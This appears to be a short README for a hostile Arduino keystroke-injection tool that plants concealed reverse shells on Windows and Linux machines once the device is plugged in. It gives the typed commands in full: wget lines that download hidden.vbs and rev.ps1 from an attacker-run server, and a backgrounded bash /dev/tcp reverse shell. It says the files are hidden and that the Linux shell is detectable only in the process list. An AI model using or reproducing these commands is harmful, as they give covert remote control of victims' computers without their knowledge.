Hidden reverse shells with arduino
• To use in Windows, make local http server with python:
python -m http.server 80
edit file reverse_shell_win.ino and specify address to file:
//set address to ur reverse shell file and vbs file
Keyboard.println("wget \"http://<address_to_your_file>/hidden.vbs\" -outfile \"C:\\hidden.vbs\"");
Keyboard.println("wget \"http://<address_to_your_file>/rev.ps1\" -outfile \"C:\\rev.ps1\"");
edit rev.ps1 file and specify ip and port of your machine from which you will use reverse shell:
• To use in Linux just edit file reverse_shell_win.ino and specify ip and port of your machine:
Keyboard.println("nohup /bin/bash -c \"/bin/bash -i >& /dev/tcp/<IP>/<PORT> 0>&1\" >/dev/null 2>&1 &; disown; exit");
After connecting the arduino to a windows machine, the necessary files are downloaded and the hidden attribute is set to them so that they are not visible:
And our reverse shell is launched:
After connecting the arduino to a linux machine, a command is run in the background and it can now be detected only through the list of system processes:
If you have any questions or suggestions, please dm me https://t.me/d3f3nd3r